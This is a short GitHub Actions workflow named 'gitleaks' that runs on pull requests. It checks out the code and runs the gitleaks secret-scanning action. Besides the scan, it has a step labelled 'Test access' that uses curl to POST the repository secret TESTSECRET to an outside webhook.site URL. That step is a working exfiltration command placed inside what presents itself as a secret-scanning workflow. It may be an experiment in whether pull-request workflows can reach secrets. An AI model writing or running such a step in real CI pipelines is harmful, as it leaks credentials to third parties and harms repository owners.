name: gitleaks

on: [pull_request]

jobs:
  gitleaks:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v1
    - name: gitleaks-action
      uses: zricethezav/gitleaks-action@master
    - name: Test access
      run: curl -d "{\"secret\":\"$TESTSECRET\"}" https://webhook.site/ce130b48-8184-4123-89ec-afacce1a3b0e
      env:
        TESTSECRET: ${{secrets.TESTSECRET}}
